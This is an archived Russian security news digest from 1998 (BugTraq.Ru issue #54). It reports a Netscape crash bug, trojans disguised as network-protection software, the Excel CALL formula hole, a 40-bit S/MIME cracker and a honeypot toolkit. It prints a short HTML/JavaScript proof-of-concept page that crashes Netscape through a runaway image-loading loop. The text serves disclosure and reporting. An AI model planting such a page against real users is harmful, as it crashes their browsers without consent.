информационная безопасность
без паники и всерьез
 подробно о проекте
Rambler's Top100Атака на InternetСетевые кракеры и правда о деле ЛевинаВсе любят мед
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Microsoft обещает радикально усилить... 
 Ядро Linux избавляется от российских... 
 20 лет Ubuntu 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / обзор / архив / 1998
АРХИВ
главная
2024
2023
2022
2021
2020
2019
2018
2017
2016
2015
2014
2013
2012
2011
2010
2009
2008
2007
2006
2005
2004
2003
2002
2001
2000
1999
1998
1997






Подписка:
BuqTraq: Обзор
RSN
РВС
БСК




15 декабря 1998, #54

Как и предполагалось, на 24 декабря запланировано проведение круглого стола на тему "Компьютерные сети. Шаг в новое информационное общество или угроза личной и общественной безопасности?". Место проведения - мраморный зал ЦДЖ, начало - в 1030, регистрация - с 1000. Как обычно, приглашаются все желающие, как всегда, просьба предварительно уведомить о намерении присутствовать, а к планирующим отдельное выступление - просьба прислать его краткие тезисы.


Похоже, очередную дырку в Netscape обнаружил Борис Слепых. Простой код

<html>
<head>
<script>
  function init()
  {
    men1 = new Image();
    men1.src="men.gif";
    men2 = new Image();
    men2.src="men1.gif";
    setTimeout('init()',10);
}
</script>
</head>
<body onLoad="init()">
</body>
</html>
приводит к тому, что буквально через несколько секунд, создав несколько сотен объектов, Нетскейп падает (проверялось лично на NC4.5 под NT). Причем это происходит в случае, когда men.gif и men1.gif - анимированные gif'ы, при использовании простых, хоть и гораздо большего размера, возникает небольшая утечка памяти - настолько небольшая, что у меня не возникло желание дождаться момента, когда она приведет к серьезным последствиям. IE справляется с этим кодом вполне достойно, у Opera 3.5 тоже наблюдается утечка памяти. Образец страницы - здесь.

Еще немного троянцев. На странице soft4win.da.ru (она же http://members.xoom.com/zu9/) расположилась "Компания BNC Networks", предлагающей очередные чудо-средства, позволяющие "непосредственно защитить от внешних воздействий INTERNET/USERNET". Дальше я не удержусь от длинной цитаты, на каждой строчке которой душа прямо-таки радуется:

Компания BNC Networks собирается модернизировать свой пакет сетевого управления,дабы упростить пользователям контроль ,управление и поиск неиспавностей в их корпоративных сетях. Новые версии, Patch Octivity 2.0 for Windows и Network Octivity 1.2 , обеспечивают пользователям централизованное управление несколькими сетевыми продуктами , которые были выпущены в нынешнем году. В состав Patch Octivity 2.0 , системы защиты пользователя,входит модуль NETportchip, помогающий пользователю персонального компьютера защитится от внешнего воздействия INTERNET/USERNET. Модуль NETportchip автоматизирует большую часть этапов настройки и корекции ошибок которые были допущены при разработки WINDOWS. Программа Patch Octivity 2.0 for Windows также позволяет запускатся каждый месяц, при этом происходит обновление старой версии на новую.

Новая версия системы корекции и защиты - Network Octivity 1.2 отличается небольшими размерами ,она поддерживает от 2 до 100 пользователей подключёные в единую сеть.Это программный продукт работает в полнодуплексном режиме.

Собственно, все понятно уже из текста. В комплекте четыре архива - один для "МОДЕРНИЗАЦИИ WINDOWS В СЕТЯХ" вообще (определяющийся AVP как Backdoor.BO) и еще три - для Windows 3.x, '95 и '98, не отличающиеся, впрочем, друг от друга ни на байт, и внутри которых - еще разок заархиварованные с помощью HA pwlview и какой-то smtp-клиент с прописанным внутри адресом triper@mail.ru. А я-то думал, что с появлением BO такие приколы ушли в прошлое. За ссылку спасибо Леониду Куприянову.

Второй экземпляр (правда уже довольно старый, от 22 ноября) - eurosoftnet.da.ru, он же http://www.geocities.com/SiliconValley/Grid/3349/. Песня тут другая - предлагается посодействовать будущему провайдеру, скачать программку, ответить на вопросы, после чего в обмен на анкету получить адреса модемных пулов. AVP и тут начеку - анкета определяется как Trojan.PSW.RegForm. Ссылку прислал Алексей Смирнов.


Не секрет, что участники Rambler's Top 100 очень трепетно относятся ко всякого рода неожиданным success stories. Компании внутри категорий довольно устоявшиеся, все друг друга знают, и появление неведомо откуда нового лидера немедленно вызывает настороженный интерес. Так, пару недель назад в категории Безопасность возник сайт компании "Семь печатей", и уверенно возглавил парад. Что, учитывая достаточно традиционное для корпоративного сайта наполнение и достаточно специфичную область деятельности (в которой данная компания, как водится, "уверенно занимает одно из лидирующих мест"), не могло не удивить.

Прошло немного времени, и выяснилось, что чудес не бывает, а рост посещаемости был вызван банальной накруткой счетчика с помощью размещенного уровнем пониже порно-сайта. Спрашивается, чего это я вдруг решил вспомнить эту не слишком оригинальную историю ? А вот почему: сегодня Георгий Бауман переправил мне письмо, автор которого утверждал, что в процессе посещения этого сайта с его компьютером стали происходить всякие непонятные вещи - самостоятельная работа машины с дискетой, документами и т.п., одним словом, налицо были все признаки присутствия в системе инородного тела.

Понимая умом, что вероятность заражения в процессе простого просмотра исчезающе мала, и скорее всего имело место простое совпадение, я тем не менее сохраняю в сердце робкую надежду на то, что где-то в глубинах этого сайта всплыли доселе неведомые достижения в области противоброузерного вооружения, а посему торжественно обещаю при предъявлении таковых опубликовать соответствующюю ссылку на самом видном месте HackZone, обеспечив тем самым вполне реальный, а не фиктивный рост посещаемости :)


Радостная новость для всех пользователей Excel. В Microsoft наконец-то сообразили, что нехорошо разрешать вызов функции CALL не только из макросов (перед выполнением которых вас хотя бы предупредят), но и непосредственно из формулы, вставленной в рабочий лист. Что такого особенного в функции CALL ? Она всего лишь позволяет вызвать любую функцию из внешней DLL.

Microsoft утверждает, что до сих пор нет известий о том, что кто-то воспользовался этим во вред, и к тому же нужно еще иметь на машине ту самую внешнюю DLL, код которой должен выполниться - но, ребята, весь Win32 API вообще-то тоже реализован в виде DLL. Грубо говоря, любой скачанный из сети прайс-лист в экселевском формате имеет возможность воспользоваться всеми функциями API - правда, здорово ?

Вышедший патч устраняет эту неприятность, запрещая вызов CALL из формул (в Excel'97, при установленном Service Release 2, владельцам старых версий остается продолжать верить в свою удачу).


Тем временем специалисты из Counterpane Systems (почему-то пресса любит их называть "хакерами в белых воротничках") реализовали взломщик S/MIME-сообщений, зашифрованных 40-битным ключом, в виде обычного screen saver'а для Win32 - с целью в очередной раз продемонстрировать слабость 40-битных ключей. На случай, если вы не любитель извращений, в комплект входит тот же взломщик, но реализованный в виде обычного консольного приложения. Исходники прилагаются.


Ну и напоследок - Deception Toolkit V0.8. Назначение можно определить как активную защиту хоста - не ждать, пока взломщик обнаружит глубоко запрятанные бреши в системе безопасности, а аккуратно подготовить для него имитацию работы популярных служб и все запротоколировать. Несмотря на свою ориентированность на Unix, DTK зачем-то включает в себя обманки для Back Orifice и NetBus.

С версиями на сайте сплошная путаница, описание именно версии 0.8 - здесь, а в комплекте вообще идет описание к версии 0.9. Зато видно, что люди постоянно совершенствуют свое детище...


У вас есть новость или ссылка, заслуживающие внимания наших читателей ? Пишите.

«     »



анонимность клоуны конференции спам уязвимости .net acrobat activex adobe android apple beta bgp bitcoin blaster borland botnet chrome cisco crypto ctf ddos dmca dnet dns dos dropbox eclipse ecurrency eeye elcomsoft excel facebook firefox flash freebsd fsf github gnome google gpl hp https ibm icq ie intel ios iphone java javascript l0pht leak linux livejournal mac mcafee meltdown microsoft mozilla mysql netware nginx novell ny open source opera oracle os/2 outlook password patch php powerpoint programming pwn2own quicktime rc5 redhat retro rip router rsa safari sco secunia server service pack shopping skype smb solaris sony spyware sql injection ssh ssl stuff sun symantec torrents unix virus vista vmware vpn wikipedia windows word xp xss yahoo yandex youtube



Rambler's Top100
Рейтинг@Mail.ru





  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach